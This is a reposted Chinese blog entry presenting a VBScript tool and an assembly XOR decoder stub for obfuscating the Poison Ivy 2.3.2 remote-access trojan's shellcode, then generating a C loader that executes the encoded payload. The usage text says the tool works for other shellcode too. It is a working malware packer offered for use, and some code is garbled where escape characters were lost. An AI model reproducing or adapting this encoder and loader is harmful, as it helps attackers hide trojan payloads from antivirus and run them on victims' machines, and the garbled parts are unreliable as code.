当前位置:编程学习 > 网站相关 >>

xor shellcode for Poison Ivy 2.3.2 bin

From vbs小铺blog

=======================================================================================================================
用c代码和汇编得到一个xor &h21 的解码头的示例代码
#include <string.h>
#include <stdio.h>

int main()
{
      __asm
     {
               jmp     decode_end                   //为了获得enShellCode的地址
decode_start:
        pop     edx                   // 得到enShellCode的开始位置 esp -> edx
             dec     edx       
               xor     ecx,ecx
               mov     cx,0x2134               //要解码的 enShellCode长度,0x2134=8500字节应该足够pi的shellcode长度
decode_loop:
              xor     byte ptr [edx+ecx], 0x21   //因为编码时用的Key是0x21,所以解码要一样
             loop     decode_loop                   //循环解码
               jmp     decode_ok                       //解码完毕后,跳到解码后的地方执行!
decode_end:
        call     decode_start
decode_ok:                                 //后面接编码后的enShellCode
      }
     return 0;
}
od反汇编得到decode的解码头为:"xEBx10x5Ax4Ax33xC9x66xB9x34x21x80x34x0Ax21xE2xFAxEBx05xE8xEBxFFxFFxFF"
==============================================================================================================================


if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end if

if Wscript.Arguments.count=0 Then
usage()
wscript.quit
End If


10进制转16进制函数
Function Dec2Hex(Dec)
     Dec2Hex = ""
     Do While Dec > 0
         a = CStr(Dec Mod 16)
         Select Case a
             Case "10": a = "A"
             Case "11": a = "B"
             Case "12": a = "C"
             Case "13": a = "D"
             Case "14": a = "E"
             Case "15": a = "F"
         End Select
         Dec2Hex = a & Dec2Hex
         Dec = Dec 16
     Loop
End Function

读取二进制文件函数

Function ReadGif(sStr)
Dim i, iHex, sPath, oStream
Set oStream = CreateObject("Adodb.Stream")
oStream.Type = 1
oStream.Open
oStream.LoadFromFile sStr

For i = 1 To LenB(oStream.Read())
     oStream.Position = 0
     iHex = Hex(AscB(MidB(oStream.Read(), i, 1)))
     If Len(iHex) = 1 Then iHex = "0" & iHex
     ReadGif = ReadGif & iHex
Next

oStream.Close
Set oStream = Nothing
End Function

把代码分块输出函数
Function CutAndJoin(sSource, iLong, sJoiner)

Dim I, N

N = Len(sSource) / iLong
If(N <> Fix(N))Then N = Fix(N) + 1

For I = 0 To N - 1
   CutAndJoin = CutAndJoin & Mid(sSource, I * iLong + 1, iLong) & sJoiner
Next

If(N > 0)Then CutAndJoin = Left(CutAndJoin, Len(CutAndJoin) - Len(sJoiner))

End Function


Set Arg=Wscript.Arguments

tempshellccode=CutAndJoin(ReadGif(arg(0)),2,"x")

shellcode=Split(tempshellccode,"x")


For i=1 To UBound(shellcode)
temp=(("&h"&shellcode(i)) Xor "&h"&arg(1))
temp=Dec2Hex(CStr(temp))
If Len(temp)=1 Then temp="0"&temp
If temp="" Then temp="00"
vbshellcode=vbshellcode&"x"&temp
Next

decode="xEBx10x5Ax4Ax33xC9x66xB9x34x21x80x34x0Ax"&arg(1)&"xE2xFAxEBx05xE8xEBxFFxFFxFF"
decode=decode&LCase(vbshellcode)

WScript.Echo CutAndJoin(decode, 80, Chr(13)) 80正好是4的倍数,这样排列好看一些


Function writef(cpp)
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(cpp,2,true)
.writeline "#include<windows.h>"
    .writeline "char ShellCode[]="
.writeline Chr(34)&CutAndJoin(decode, 80, Chr(34)&Chr(13)&Chr(34))&Chr(34)&";"
.writeline "int main()"
    .writeline "{"
    .writeline " ( (void(*)(void)) &ShellCode)();"
    .writeline "return 0;"
    .writeline "}"
   .close
End with
Set fso = Nothing
End Function

writef(arg(2))


Function Findfile(str)
Set FSO = CreateObject("Scripting.FileSystemObject")
If FSO.FileExists(str) Then
findfile=true
Else
findfile=false
End If
End Function


If Findfile(arg(2))=True then
wsh.echo "已生成"&arg(2)&"的c语言格式文件"
End if


function usage()
wscript.echo "+--codz By lcx ^^ shellcode xor for Poison Ivy 2.3.2 vbscript-------+"
wscript.echo "|不只是针对Poison的bin文件进行变形,稍做改动可以xor其它的shellcode---+"
wscript.echo "|Useage:                                                            |"
wscript.echo "|       cscript.exe shellcode.vbs x.bin xorhexnum test.cpp          |"
wscript.echo "|ex:                                                                |"
wscript.echo "|       cscript.exe shellcode.vbs c:PoisonIvy.bin 21 c: est.c

补充:综合编程 , 安全编程 ,
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,